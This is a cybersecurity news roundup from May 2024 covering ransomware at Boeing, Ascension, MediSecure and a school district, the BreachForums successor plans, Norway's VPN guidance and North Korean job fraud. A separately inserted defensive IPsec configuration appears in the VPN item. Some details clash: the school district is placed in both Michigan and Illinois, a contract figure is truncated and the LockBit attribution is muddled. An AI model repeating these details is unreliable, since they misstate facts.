18 May 2024

TCE Cyberwatch: This Week’s Cybersecurity Rundown


This week on TCE Cyberwatch, we delve into the recent hacking of major organizations, including the International Baccalaureate, Boeing, and BetterHelp, which has sparked widespread concern online. We also highlight ongoing developments in enhancing cybersecurity measures.

National governments are also grappling with cybersecurity challenges. TCE Cyberwatch examines how these issues have affected countries and the proactive steps organizations are taking to stay ahead in the evolving landscape of cybersecurity. Keep reading for the latest updates.

TCE Cyberwatch: A Weekly Round-Up

IB Denies Exam Leak Rumors, Points to Student Sharing

The International Baccalaureate Organization (IBO) faced allegations of exam paper leaks, but it denied any involvement in a cheating scandal. Instead, the organization acknowledged experiencing a hacking incident, unrelated to the current exam papers circulating online.

The breach was attributed to students sharing exam materials on social media platforms. Concurrently, the IBO detected malicious activity within its computer networks.

The act of students sharing exam content online is commonly known as "time zone cheating," wherein students who have already completed their exams disclose details about the questions before others take the test. Separately, the malicious activity targeted data from 2018, including employee names, positions, and emails. Screenshots of this leaked information surfaced online.

Boeing Hit by $200 Million Ransomware Attack, Data Leaked

The aeronautical and defense corporation Boeing recently confirmed that it had been targeted by the LockBit ransomware gang in October 2023. Boeing also acknowledged receiving a $200 million demand from the attackers to prevent the publication of leaked data. On November 10, approximately 40GB of data was leaked by LockBit, though Boeing has not yet addressed the situation. The ransomware group initially identified Dmitry Yuryevich Khoroshev as the principal administrator and developer behind the LockBit ransomware operation. However, this claim has since been denied by the actual developer. Boeing has also not announced whether it paid the $200 million extortion demand.

Lenovo Pledges Stronger Cybersecurity with "Secure by Design" Initiative

Lenovo recently joined the Secure by Design pledge initiated by the US Cybersecurity and Infrastructure Security Agency (CISA) to enhance its cybersecurity measures. The announcement was made on May 8th, and the pledge covers several areas, including multi-factor authentication and vulnerability reduction. Doug Fisher, Lenovo’s Chief Security Officer, emphasized the importance of industry collaboration in driving meaningful progress and accountability in security. "It’s good for the industry that global technology leaders are able to share best practices," he stated. Many other technology companies have also signed the pledge.

UK’s AI Safety Institute Releases Public Platform for AI Safety Testing

The UK’s AI Safety Institute has made its AI testing and evaluation platform, Inspect, publicly available. The platform aims to encourage more safety testing of AI models and support the development of secure models. It works by assessing a model's capabilities and then producing a score. Because it is released under an open-source licence, it is available to AI enthusiasts, start-up businesses and international governments. Ian Hogarth, Chair of the AI Safety Institute, stated: “We have been inspired by some of the leading open-source AI developers - most notably projects like GPT-NeoX, OLMo or Pythia which all have publicly available training data and OSI-licensed training and evaluation code, model weights, and partially trained checkpoints.” Inspect evaluates models in areas such as their autonomous capabilities, reasoning abilities, and overall core knowledge.

NASA Names First Chief Artificial Intelligence Officer

NASA announced its first Chief Artificial Intelligence (AI) Officer. David Salvagnini, who previously served as the Chief Data Officer, has now expanded his role to incorporate AI. His responsibilities include developing a strategic vision and planning NASA's AI usage in research projects, data analysis, and system development.

NASA Administrator Bill Nelson stated, “Artificial intelligence has been safely used at NASA for decades, and as this technology expanded, it accelerated the pace of discovery.” Salvagnini also works alongside government agencies, academic institutions, and others in the field to ensure NASA remains up to date with the AI revolution.

DDoS Attacks Target Australia Amidst Ukraine Support

The Cyber Army Russia Reborn launched Distributed Denial of Service (DDoS) attacks targeting prominent Australian companies like Auditco and Wavcabs. While the exact motive remains unclear, the timing suggests a political backlash against Australia's solidarity with Ukraine.

Wavcabs experienced disruptions to its online services, while Auditco encountered technical difficulties believed to be linked to these attacks. Despite the cyber onslaught, Australia remained steadfast in its support for Ukraine, announcing a $100 million aid package comprising military assistance and defense industry support.

British Columbia Thwarts Government Cyberattack, Strengthens Defenses

British Columbia’s government recently confirmed an attempt to infiltrate their information systems. The incidents were identified as “sophisticated cybersecurity incidents” by B.C.’s solicitor-general and public safety minister. There is no current evidence suggesting that personal information, such as health records, was compromised. The government's proactive measures in 2022 played a significant role in detecting the breach.

The government took further steps to secure its systems, including requiring government employees to change their passwords. Officials and cybersecurity experts continue to work to ensure sensitive information remains secure and to prevent unauthorized access. Officials appear to be using this incident to prepare for future cyber threats.

Urgent Chrome Update: Google Patches Sixth Zero-Day of 2024

A new vulnerability in Google Chrome was uncovered, marking their sixth zero-day incident in 2024. Google swiftly released an emergency update to patch the issue, ensuring users' safety. Updates were promptly distributed across Mac, Windows, and Linux platforms.

For those concerned about their security, updating their devices is crucial. Users can navigate to Settings > About Chrome to initiate the update process. While Google has not disclosed specific details about the vulnerability, the urgency conveyed by its release of an "emergency patch" underscores the severity of the situation.

To Wrap Up

Cyberattacks continue to dominate headlines, but this week's TCE Cyberwatch report also reveals positive developments. Governments are taking action, with proactive measures in British Columbia and the UK's AI safety testing platform. Organizations are prioritizing security, as seen in Lenovo's "Secure by Design" initiative.

Individuals play a crucial role too. The recent Google Chrome update reminds us to prioritize software updates. While cyber threats persist, these advancements offer a reason for cautious optimism. By working together, we can build a more secure digital future.

Remember, vigilance is key. Update your software regularly and follow best practices to minimize vulnerabilities. TCE Cyberwatch remains committed to keeping you informed.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
17 May 2024

Ascension Faces Multiple Lawsuits Following Ransomware Attack


Following the recent Ascension ransomware attack, legal challenges are mounting for the healthcare giant. Just days after the cyberattack disrupted operations across its extensive network of 140 hospitals, Ascension is facing two proposed class-action lawsuits. The lawsuits, filed in the District Courts of Illinois and Texas, allege negligence on Ascension's part, citing the failure to encrypt patient data as a critical oversight. This, plaintiffs argue, has exposed them to the risk of identity theft for years to come, following the Ascension cyberattack that forced the diversion of ambulances and the suspension of elective care services.

Class-Action Lawsuit Arises from Ascension Ransomware Attack

While Ascension has not confirmed any compromise of patient data, investigations are ongoing. Plaintiffs contend that had proper encryption measures been in place, data stolen by the cybercriminal group Black Basta would have been rendered useless, highlighting the negligence they claim Ascension displayed.

"We are conducting a thorough investigation of the incident with the support of leading cybersecurity experts and law enforcement," an Ascension spokesperson stated. "If we determine sensitive data was potentially exfiltrated or accessed, we will notify and support the affected individuals in accordance with all relevant regulatory and legal obligations," Healthcare Dive reported on Thursday.

The lawsuits, filed shortly after the Ascension ransomware attack, target the healthcare provider's alleged failure to implement adequate cybersecurity measures, which plaintiffs argue could have prevented the incident. Both cases, represented by the same legal counsel, highlight the harm suffered by patients due to the exposure of their private information, which they assert was foreseeable and preventable.

Ascension Lawsuit and Mitigation Tactics

Despite ongoing investigations and assurances of cooperation with authorities, Ascension has yet to disclose whether patients' sensitive information was compromised during the cyber incident. “Ascension continues to make progress towards restoration and recovery following the recent ransomware attack. We continue to work with industry leading forensic experts from Mandiant to conduct our investigation into this attack and understand the root cause and how this incident occurred,” stated Ascension on its Cybersecurity Event Update page.

In parallel, additional cybersecurity experts from Palo Alto Networks Unit 42 and CYPFER have been brought in to supplement the rebuilding and restoration efforts. The focus is on safely and swiftly bringing systems back online. “We are also working on reconnecting with our vendors with the help of our recovery experts. Please be aware that it may still take some time to return to normal operations,” added Ascension.

The Catholic health system, which spans 140 hospitals and 40 senior living facilities nationwide, employs a workforce of approximately 132,000 individuals. Despite the financial strain imposed by the Ascension ransomware attack, industry analysts note Ascension's robust liquidity and leverage position, offering a significant rating cushion against such one-off events.

Threat Actor USDoD Announces Creation of ‘Breach Nation’, Following BreachForums Take Down

By: Alan J
17 May 2024 at 07:22


The recent takedown of BreachForums by the FBI, in collaboration with international law enforcement agencies, marked a significant victory against cybercrime. Yet less than 24 hours after this major blow, the renowned threat actor known as USDoD announced plans to resurrect the forum's community, demonstrating the relentless nature of the cyber underworld.

BreachForums had long been a central marketplace for cybercriminals, facilitating the trade of stolen data and hacking tools. Its sudden removal from the dark web was a monumental achievement for law enforcement, akin to dismantling a major illicit market. However, the cybercriminal community's response was swift and defiant: just a day later, ShinyHunters, one of the remaining administrators, allegedly claimed that the site domain itself had been recovered. Alongside the possible domain recovery, USDoD separately pledged to rebuild and improve upon BreachForums through a new competing forum, promising a new beginning for the infamous community.

USDoD Announces Creation of Breach Nation Forum

In a bold statement following the takedown, USDoD assured the community that he had already been working on rebuilding BreachForums, promising that the forum's legacy and user data would be preserved. He emphasized his dedication to creating a new community, presenting the takedown not as the end but as an opportunity for a fresh start.

[Image: Source: X.com (@EquationCorp)]

His announcement also detailed the allocation of resources and infrastructure to support the new forum. The new domains, breachnation.io and databreached.io, are set to launch on July 4, 2024, symbolically coinciding with Independence Day. This new community, dubbed "Breach Nation," aims to offer enhanced features and security.

[Image: USDoD Creation of BreachNation. Source: X.com (@EquationCorp)]

USDoD’s vision for BreachForums 3.0 includes robust infrastructure, with separate servers to ensure optimal performance and security. He has assured the community that he is not driven by profit and aims to offer an upgraded member rank to the first 200,000 users as a token of goodwill. He acknowledged the challenges ahead, including potential opposition from law enforcement as well as possible competition from the BreachForums administrator ShinyHunters. He also addressed concerns about compromise within the forum's administration, stating that he would initially manage it alone to ensure security and build trust.

USDoD's Earlier Activities

USDoD's bold promise to create the new Breach Nation forum highlights the persistence of the cybercriminal underworld. The threat actor is a notable figure in the cybercriminal community and was previously known as NetSec on RaidForums. USDoD is known to employ sophisticated social engineering and impersonation techniques to penetrate secure systems. His activities included exposing data related to several high-profile organizations, such as InfraGard, Airbus, the U.S. Army, NATO Cyber Center, and CEPOL. He also claimed responsibility for alleged data leaks from the defense contractor Thales as well as the Communist Party of China.

A newer CDN created by USDoD was first publicized around the same time as the alleged China data leak. This CDN is stated to be incorporated into the new domain's infrastructure and appears to be being reworked and shifted to a new domain.

[Image: BreachForums Creation of BreachNation (4). Source: X.com (@EquationCorp)]

While the potential impact of the new forum remains unclear, it may be a key development to watch in the ongoing struggle between law enforcement and cybercrime in the aftermath of the BreachForums domain seizure.

MediSecure Data Breach an ‘Isolated’ Attack; No Impact on Current e-Prescriptions


The MediSecure data breach is an “isolated” attack with no impact on current e-Prescription services, the Australian National Cyber Security Coordinator said on Friday. There is also no evidence of an increased cyber threat to the medical sector, she added.

After the electronic prescriptions provider MediSecure on Thursday reported being the victim of a “large-scale ransomware data breach” that likely originated from a third-party vendor, Australia’s cyber chief, Lieutenant General Michelle McGuinness, said in an update that the government was still “working to build a picture of the size and nature of the data that has been impacted by this data breach.”

“This (breach) discovery work often takes time and I understand Australians are anxious about the possibility of their personal information being affected,” the cyber chief said.

McGuinness said she convened the National Coordination Mechanism (NCM) with the National Emergency Management Agency on Thursday, which brings all relevant Government stakeholders together and ensures they are in sync with the same information and understanding of the issue. “The NCM allows us to achieve strong situational awareness and ensures that together, we’re best positioned to identify options available to the Australian Government to respond to the incident,” she added.

The cyber chief assured that the authorities were working at top pace to complete their investigation and would soon share information about what has been impacted. “We will share this with you – along with what affected people may need to do to protect themselves,” McGuinness said.

Timeline of the MediSecure Data Breach – So Far

The Australian National Cyber Security Coordinator first disclosed details of the MediSecure “large-scale ransomware data breach incident” on Thursday morning, stating that it impacted the personal and health information of individuals. McGuinness said in a statement that her office was managing the fallout from the major hacking incident through a “whole-of-government response.”

“We are in the very preliminary stages of our response and there is limited detail to share at this stage, but I will continue to provide updates as we progress while working closely with the affected commercial organization to address the impacts caused by the incident,” said McGuinness at the time. She did not initially name the victim company but said it was a “commercial health information organization.” Local media, however, later confirmed that the unnamed entity was MediSecure, which was at the center of the large-scale ransomware data breach announced by the National Cyber Security Coordinator.

The e-prescription provider MediSecure’s websites had been down since Wednesday, but on Thursday evening the company issued a statement acknowledging the cybersecurity incident, which said that "early indicators suggest the incident originated from one of our third-party vendors." The company did not disclose specifics such as the number of people impacted, the type of information compromised and the threat actor behind the ransomware breach, but said the cybersecurity incident impacts “the personal and health information of individuals.”

McGuinness said the Australian Cyber Security Centre was aware of the incident and the Australian Federal Police was investigating it. In a Friday update the cyber chief said that, based on the preliminary investigation, what the Government could confirm was that “no current ePrescriptions have been impacted or accessed.” “The Department of Health has confirmed there has been no impact to the ePrescription services currently in use,” McGuinness said.

“On the basis of technical advice from MediSecure to date, the original compromise has been isolated and there is no evidence to suggest an increased cyber threat to the medical sector,” McGuinness said.

The investigators have not seen any evidence of identity documents being compromised in the breach. They are currently working with the company and other agencies “to build a full picture of the impacted dataset,” McGuinness said. “We have not seen evidence so far to suggest that anyone needs to replace their Medicare card. If our investigation turns up any evidence to suggest Australians’ identities are at risk and they need to replace their documents, we will let them know.”

The Australian Medical Association was briefed on Friday morning by the cyber chief’s office about the MediSecure data breach after it demanded a thorough and transparent investigation with clear and consistent communication to the public and the medical fraternity. “This is critical to maintaining community trust in the electronic systems that are now integral to the functioning of our health system,” the AMA had earlier said. The AMA welcomed the formation of a National Stakeholder Group to support the government's response. “While we expect to see further updates from the government, the most important message today is that patients should not hesitate to get their prescriptions filled as these are not affected by the breach,” the AMA said.

MediSecure is Only One-of-Two

MediSecure is a prescription exchange service (PES), a kind of secure messaging system that specializes in transferring prescriptions between healthcare providers or doctors (prescribers) and the pharmacy (dispenser). It is one of only two ePrescription providers in Australia, and it became prominent for issuing millions of electronic prescriptions when the Covid-19 pandemic began in 2020. As of January 2024, more than 80,000 prescribers in Australia, including general practitioners and nurses, have issued over 189 million e-prescriptions.

The tender closed on 2 June 2022 and in May 2023, the department signed a 4-year contract for Fred IT's. The Department of Health last year shifted to a single provider – eRx supplied by Fred IT Group – in a four-year agreement that cost more than $100. As part of that agreement, eRx Script Exchange became the sole supplier of the national Prescription Delivery Service from July 1, 2023, which meant public healthcare providers and pharmacies were required to shift entirely from MediSecure to eRx ePrescriptions. MediSecure still provides prescription services to private providers.

Norwegian National Cyber Security Centre Recommends Moving Away from SSLVPN and WebVPN

By: Alan J
17 May 2024 at 02:44


The Norwegian National Cyber Security Centre (NCSC) has issued a recommendation advising organizations to replace SSLVPN and WebVPN solutions with more secure alternatives, because repeated exploitation of vulnerabilities in edge network devices has in the past allowed attackers to breach corporate networks.

The NCSC, a sub-division of the Norwegian Security Authority, functions as Norway's primary liaison for coordinating national efforts to prevent, detect, and respond to cyber attacks, as well as providing strategic guidance and technical support to enhance the overall cyber security posture of the country. This includes conducting risk assessments, disseminating threat intelligence, and promoting best practices in both the public and private sectors. The NCSC's guidance is aimed at enhancing the security posture of organizations, particularly those within critical infrastructure sectors, by advocating for the transition to more robust and secure remote access protocols.

Replacement of SSLVPN and WebVPN With Secure Alternatives

The NCSC's recommendation is underpinned by the recognition that SSL VPN and WebVPN, while providing secure remote access over the internet via SSL/TLS protocols, have been repeatedly targeted due to inherent vulnerabilities. These solutions create an "encryption tunnel" to secure the connection between the user's device and the VPN server. However, the exploitation of these vulnerabilities by malicious actors has led the NCSC to advise organizations to migrate to Internet Protocol Security (IPsec) with Internet Key Exchange (IKEv2).

IPsec with IKEv2 is the NCSC's recommended alternative for secure remote access. This protocol encrypts and authenticates each packet of data, using keys that are refreshed periodically. Despite acknowledging that no protocol is entirely free of flaws, the NCSC believes that IPsec with IKEv2 significantly reduces the attack surface for secure remote access incidents, especially due to its reduced tolerance for configuration errors compared to SSLVPN.

The NCSC emphasizes the importance of initiating the transition process without delay. Organizations subject to the Safety Act or classified as critical infrastructure are encouraged to complete the transition by the end of 2024, with all other organizations urged to finalize the switch by 2025. The recommendation to adopt IPsec over other protocols is not unique to Norway; other countries, including the USA and the UK, have also endorsed similar guidelines, underscoring the global consensus on the enhanced security offered by IPsec with IKEv2. As a preventative measure, the NCSC also recommended the use of 5G from mobile or mobile broadband as an alternative in locations where it was not possible to implement an IPsec connection.
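As an added illustration of the recommendation above (this is not from the NCSC advisory or the article), the following strongSwan swanctl.conf fragment configures an IKEv2-only remote-access gateway with certificate-based authentication, a single AEAD proposal, and periodic rekeying of both the IKE SA and the child SA, so that the properties the NCSC cites (per-packet encryption and authentication, refreshed keys) are actually enforced. The hostname, addresses and certificate file names are placeholders.

```conf
# Constructed example: strongSwan swanctl.conf for an IKEv2 remote-access gateway.
# Hostnames, addresses and certificate file names are placeholders.
connections {
    remote-access {
        version       = 2                  # IKEv2 only; IKEv1 is never negotiated
        local_addrs   = 203.0.113.10       # gateway address (placeholder)
        pools         = ra-pool
        # One AEAD proposal with a modern DH group: no fallback to weaker ciphers
        proposals     = aes256gcm16-prfsha384-ecp384
        rekey_time    = 4h                 # refresh IKE SA keys periodically
        dpd_delay     = 30s                # detect dead peers and clean up SAs
        fragmentation = yes                # IKEv2 fragmentation for large cert payloads

        local {
            auth  = pubkey
            certs = gateway-cert.pem       # placeholder, issued by the organisation's CA
            id    = vpn.example.org        # placeholder identity
        }
        remote {
            auth   = eap-tls               # client certificates; no password-only auth
            eap_id = %any
        }
        children {
            internal {
                local_ts      = 10.0.0.0/8             # only internal ranges are reachable
                esp_proposals = aes256gcm16-ecp384     # ESP with perfect forward secrecy
                rekey_time    = 1h                     # refresh child SA keys periodically
                dpd_action    = clear
            }
        }
    }
}

pools {
    ra-pool {
        addrs = 10.250.0.0/16              # virtual IPs handed to clients (placeholder)
        dns   = 10.0.0.53                  # internal resolver (placeholder)
    }
}
```

Because `version = 2` and the single `proposals` line leave nothing to negotiate down to, a misconfigured client simply fails to connect rather than silently falling back to a weaker mode.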

Recommendation Follows Earlier Notice About Exploitation

Last month, the Norwegian National Cyber Security Centre had issued a notice about a targeted attack campaign against SSLVPN products in which attackers exploited multiple zero-day vulnerabilities in Cisco ASA VPN devices used to power critical infrastructure facilities. The campaign had been observed since November 2023. This notice, intended primarily for critical infrastructure businesses, warned that while the entry vector in the campaign was unknown, the presence of one or more zero-day vulnerabilities potentially allowed external attackers under certain conditions to bypass authentication, intrude into devices and grant themselves administrative privileges.

The notice shared several recommendations to protect against the attacks, such as blocking access to services from insecure infrastructure, including anonymization services (VPN providers and Tor exit nodes) and VPS providers. Cisco released important security updates to address these vulnerabilities. The earlier notice also recommended that businesses switch from the SSLVPN/clientless VPN product category to IPsec with IKEv2, due to the presence of critical vulnerabilities in such VPN products regardless of the VPN provider. The NCSC recommends that businesses in need of assistance contact their sector CERT or MSSP.

Chicago Fire FC Data Breach: Exposed Fan Info? Here’s What’s at Risk!


A recent cyberattack on Chicago Fire FC has come to light, with the football club officially confirming the data breach. The club released a statement addressing the incident, highlighting the importance of privacy and security for all involved parties. The Chicago Fire FC data breach, discovered on October 25, 2023, involved unauthorized access to the club's systems, potentially compromising personal information. Immediate measures were taken upon detection, including securing systems and launching an investigation with legal and forensic experts. The unauthorized access occurred between October 22 and October 25, 2023.

Decoding the Chicago Fire FC Data Breach

According to the official press release, personal data that may have been accessed includes names, social security numbers, driver’s license and passport information, medical records (including Covid test results and injury reports), health insurance details, financial account information, and dates of birth. While there is no current indication of misuse, the club is taking proactive steps to address the Chicago Fire FC data breach. In response to the cyberattack on the football club, Chicago Fire FC has initiated several actions. These include providing affected individuals access to credit monitoring services through Cyberscout, a TransUnion company specializing in fraud assistance. Instructions for enrollment in these complimentary services have been made available, and affected individuals are encouraged to confirm eligibility by contacting the club. Individuals who believe they may have been affected but have not received notification are urged to reach out to Chicago Fire FC for assistance and to receive a credit monitoring code. Additionally, the club has reported the incident to law enforcement for further investigation.

Mitigation Against the Chicago Fire FC Cyberattack

To safeguard against potential identity theft and fraud, affected individuals are advised to monitor their accounts and credit reports for any suspicious activity. They can obtain free credit reports annually from major credit reporting bureaus and are entitled to place fraud alerts or credit freezes on their accounts. For further information and support regarding identity theft and fraud prevention, individuals can contact the credit reporting bureaus, the Federal Trade Commission (FTC), or their state Attorney General. The FTC encourages victims of identity theft to file a complaint with them and provides resources for reporting instances of misuse. Chicago Fire FC emphasizes its commitment to data security and the protection of individuals' information. The club remains dedicated to maintaining trust and providing support to those affected by the cyberattack.

Chicago Fire FC Offers Credit Monitoring Services

[Image: Chicago Fire FC data breach. Source: Chicago Fire FC]

To enroll in the credit monitoring services provided by Chicago Fire FC at no charge, individuals are instructed to visit https://bfs.cyberscout.com/activate and follow the provided instructions. It is essential to enroll within 90 days from the date of the notification letter to receive the monitoring services. However, minors under 18 years of age may not be eligible for this service. During the enrollment process, individuals may need to verify personal information to confirm their identity for security purposes.

It is strongly advised to monitor accounts and credit reports regularly to detect any suspicious activity or errors. Under U.S. law, individuals are entitled to one free credit report annually from each of the three major credit reporting bureaus: TransUnion, Experian, and Equifax. These reports can be ordered at www.annualcreditreport.com or by calling 1-877-322-8228. Upon receiving the report, individuals should carefully review it for any discrepancies, unauthorized accounts, or inquiries.

Individuals also have the right to place a fraud alert on their credit file at no cost. This alert lasts for one year and requires businesses to verify the individual's identity before extending new credit. Victims of identity theft can request an extended fraud alert lasting seven years. Alternatively, individuals can opt for a "credit freeze," which restricts access to their credit report without their explicit authorization. While this prevents unauthorized access, it may also delay or interfere with legitimate credit applications. To request a fraud alert or credit freeze, individuals need to provide specific information to the three major credit reporting bureaus, including their full name, social security number, date of birth, address history, and proof of identity.

Additionally, victims of identity theft should file a police report and notify law enforcement, their state Attorney General, and the Federal Trade Commission (FTC).

Dispel Appoints Dean Macris as Chief Information Security Officer


Dispel, a provider of zero-trust remote access, data streaming, managed attribution, and DMZ unification for industrial control systems, announced that its Board of Directors has appointed Dean Macris as the company’s new Chief Information Security Officer (CISO).

Macris, a seasoned cybersecurity expert, will oversee the company's compliance with a range of rigorous standards, including NIST 800-53, NIST 800-171, NIST 800-172, NERC CIP, IEC 62443, SOC 2, and ISO 27001.

The announcement was accompanied by a statement from Chris DiLorenzo, Dispel’s Chief Technology Officer (CTO), emphasizing the multifaceted nature of modern cybersecurity challenges. “Given the environments our systems are being asked to operate in, we needed someone who recognized cybersecurity was not only a programming and process problem but also an electromagnetic problem,” DiLorenzo noted. “Dean has that firsthand knowledge.”

Dean Macris: Diverse Experience in Cybersecurity

Macris's career spans significant roles in both operational and information technology. His experience includes serving as the Theater Operations Officer of U.S. Forces Korea and Cyber Technical Director for Naval Special Warfare. At General Dynamics Electric Boat, Dean Macris managed the Signature Secret Network, the company's largest classified information system. Additionally, he has an academic background as an instructor of Cyber Systems at the United States Coast Guard Academy, where he led the development of the Seagoing Vessel Testbed for Industrial Controls within the Control Environment Laboratory Resource. Dean Macris also continues his military service as a Lieutenant Commander in the U.S. Navy.

Macris’s appointment signals Dispel's commitment to integrating enhanced cybersecurity measures into its product lifecycle. Ian Schmertzler, Dispel’s President and Co-founder, highlighted this approach. "We wanted someone who would work to meet the spirit, as well as the letter, of cybersecurity standards," Schmertzler said. "That is not only the right thing to do, but also a competitive differentiator in our markets."

Impressive Academic Background

Macris holds a BS in Systems Engineering from the U.S. Merchant Marine Academy and an MBA from the University of Connecticut. He is also pursuing advanced studies, including a Master’s in National Security and Strategic Studies from the U.S. Naval War College and a PhD in Computer Engineering from the University of Rhode Island.

Dispel, founded in 2015, has quickly established itself as a leading provider of zero-trust remote access, data streaming, managed attribution, and DMZ unification for industrial control systems. The company's technologies serve a diverse array of clients, representing roughly half a trillion dollars in annual manufactured output worldwide.

With cybersecurity threats on the rise, Dispel’s proactive stance on security compliance is critical for protecting industrial control systems that underpin essential sectors like energy, manufacturing, and transportation. Macris’s extensive background is expected to enhance Dispel’s ability to deliver secure, innovative solutions. His blend of military, academic, and industry experience equips him to address the complex security challenges faced by Dispel's clients. This appointment comes at a time when cybersecurity is more crucial than ever, especially for the critical infrastructure that Dispel’s solutions help protect.

Rockford Public Schools Restores Systems After Ransomware Attack

By: Alan J
17 May 2024 at 01:00


The Rockford Public School District in Michigan has successfully restored its systems after a ransomware attack caused significant disruption earlier this week, forcing the shutdown of its computer, email, and phone systems. The district acted swiftly to contain the Rockford Public Schools ransomware attack and protect its students and staff, but the containment measures also forced it to fall back on traditional pen-and-paper methods for schooling. A day after the incident, the district superintendent confirmed the isolation of the attack and the restoration of systems, indicating that students and staff could operate as normal.

Established in 1884, Rockford Public Schools is a prominent educational institution in Rockford, Illinois. It spans portions of Kent County and serves parts of Plainfield, Algoma, Courtland, Cannon, Grattan, and Oakfield Townships. The district's consolidation in the late 1950s brought together several neighborhood school systems, and it has since expanded to 45 schools serving approximately 27,766 students.

Systems Restored After Rockford Public Schools Ransomware Attack

On the morning of the incident, district leaders were alerted to computer system failures that disrupted the district's phones and internet services. While the outage was initially suspected to be a vendor issue, it soon became clear that the district had been struck by a ransomware attack after ransom notes were discovered on various printers. Superintendent Steve Matthews promptly ordered the shutdown of all network connections, including Wi-Fi, to contain the threat. He anticipated that it would take at least a couple of days for the district to return to normal operations. During the attack, the district's official website displayed emergency phone numbers for its various buildings.

[Image: Emergency phone numbers posted by Rockford Public Schools during the attack. Source: rockfordschools.org]

Despite the attack, there was no immediate threat to student safety. Classes continued as usual, albeit with a return to traditional, technology-free teaching methods. Superintendent Matthews reassured parents that the security systems for school doors remained functional and that emergency cell phones were made available for parental contact. The FBI was also involved in the investigation, working alongside district staff to assess the extent of the breach.

Superintendent Matthews acknowledged the initial challenge but noted that staff were quickly adjusting to the incident. Students reported a unique experience of learning without digital tools, while some found the situation disconcerting. Parents were informed about the situation through emergency communication channels. While some parents chose to pick up their children early, the overall response was one of cautious adaptation.

Following the preventative measures, the district restored its computer systems 24 hours later, with the superintendent stating that the incident had been isolated and contained. The school issued a letter to parents indicating that students and staff could resume using district-provided equipment or their own personal devices.

Expert Indicates Educational Institutes as Common Ransomware Target

Cybersecurity expert Greg Gogolin from Ferris State University noted in response to the incident that school districts are common targets for ransomware attacks due to inadequate preventive measures and limited cybersecurity staff. Gogolin highlighted that the end of the school year is a particularly vulnerable time for such attacks, as the urgency to resolve the situation increases with grades due and other academic deadlines approaching. Affluent districts are particularly targeted because attackers perceive them as having more resources available.

To mitigate such risks, Gogolin advises districts to invest in advanced email filtering while educating staff about phishing emails. Additionally, teachers and students should maintain backups of essential data, such as grades and assignments, outside of school networks.

The return to traditional schooling methods following the Rockford Public Schools ransomware attack is reminiscent of an earlier incident affecting Cannes Hospital, which forced its staff to resort to pen-and-paper techniques to keep services running.

US Charged North Korean Job Fraud Nexus Amassing Funds for Nuclear Program


U.S. federal prosecutors on Thursday revealed charges against a North Korean job fraud nexus that ran a fraudulent scheme to generate illicit revenue for Kim Jong Un’s regime and support its sanctioned nuclear program. The U.S. Department of Justice indicted an Arizona woman, a Ukrainian man and three North Korean nationals for their alleged participation in job fraud schemes that placed overseas information technology workers, posing as U.S. citizens and residents, in remote positions at U.S. companies.

This job fraud nexus scammed more than 300 U.S. companies and accumulated at least $6.8 million, said the unsealed indictment of Christina Marie Chapman, 49, from Litchfield Park, Arizona. The U.S. State Department said that between October 2020 and October 2023, Chapman, a U.S. citizen, helped North Korean IT workers using the aliases Jiho Han, Chunji Jin and Haoran Xu to fraudulently obtain work as remote software and applications developers with companies in a range of sectors and industries, including a major television network, a Silicon Valley technology company, an aerospace and defense company, an American car manufacturer, a luxury retail store and a U.S.-hallmark media and entertainment company.
“They also attempted - but failed - to gain similar employment at two U.S. government agencies,” the State Department said.
In running the job fraud scheme, Chapman and her co-conspirators relied on identity fraud. “They compromised more than 60 identities of (legitimate) U.S. persons, impacted more than 300 U.S. companies, caused false information to be conveyed to the Department of Homeland Security on more than 100 occasions, created false tax liabilities for more than 35 U.S. persons, and resulted in at least $6.8 million of revenue to be generated for the overseas IT workers,” the Justice Department said.

Chapman’s Role in Job Fraud

Chapman hosted a “laptop farm” for the North Korean IT workers at her residence, so that the computers appeared to be located within the United States on a daily basis.
“She also helped launder the proceeds from the scheme by receiving, processing, and distributing paychecks from the U.S. firms to these IT workers and others,” the State Department said.
Chapman was arrested on Wednesday in her hometown in Arizona and faces a litany of counts including conspiracy to defraud the United States, conspiracy to commit wire fraud, conspiracy to commit bank fraud, aggravated identity theft, conspiracy to commit identity fraud, conspiracy to launder monetary instruments, operating as an unlicensed money transmitting business, and unlawful employment of aliens.

Didenko, the Facilitator

The Justice Department also named a Ukrainian national, Oleksandr Didenko, 27, in the unsealed charges. Didenko allegedly ran a multi-year scheme to create accounts at U.S.-based freelance IT job search platforms under false identities and sold these accounts to overseas IT workers. Remote workers used these false identities to apply for jobs with unsuspecting companies. To facilitate this fraudulent activity, Didenko hosted a website, “UpWorkSell”, which advertised the ability for remote IT workers to buy or rent accounts on various platforms using identities other than their own. The complaint alleged that Didenko offered a full array of services to allow an individual to pose under a false identity and market themselves for remote IT work, and that he knew some of his customers were North Korean.

Didenko managed approximately 871 proxy identities and provided proxy accounts for three freelance IT hiring platforms and three different money service transmitters, the complaint said. Together with his co-conspirators, Didenko facilitated the operation of at least three U.S.-based “laptop farms,” hosting approximately 79 computers. The Justice Department said it raided four U.S. residences under Didenko’s control where he ran laptop farms. He also laundered $920,000 worth of payments since July 2018 in the job fraud scheme. Didenko was arrested in Poland on May 7, and the State Department is seeking his extradition.

The North Korean Trio

The three North Korean workers "are linked to the DPRK’s Munitions Industry Department, which oversees the development of the DPRK’s ballistic missiles, weapons production, and research and development programs," the State Department said. The department said the workers tried to get hired at two unnamed U.S. government agencies but failed three separate times. Details about the three North Korean IT workers are scarce, but the State Department released an image of Jiho Han on its Rewards for Justice platform, where it also announced a bounty of up to $5 million for information on any of these North Korean IT workers that leads to the disruption of the financial mechanisms of the people involved.

[Image: Rewards for Justice notice on North Korean IT workers. Credit: U.S. Department of State]

The FBI also released an alert about North Korean IT workers and their scheme to defraud U.S. businesses and fund Pyongyang’s illicit activities.

Targeting of Illicit IT Worker Activities

The latest announcement comes almost a year after the U.S. Treasury announced sanctions on four entities that employed thousands of North Korean IT workers who helped illicitly finance the regime's missile and weapons of mass destruction programs. The Treasury, at the time, said North Korea had scores of “highly skilled” IT workers around the globe who “generate revenue that contributes to its unlawful WMD and ballistic missile programs.” These individuals, who can earn up to $300,000 annually, “deliberately” obscure their identities, locations and nationalities, using proxy accounts, stolen identities and falsified or forged documentation to apply for jobs, the Treasury said.

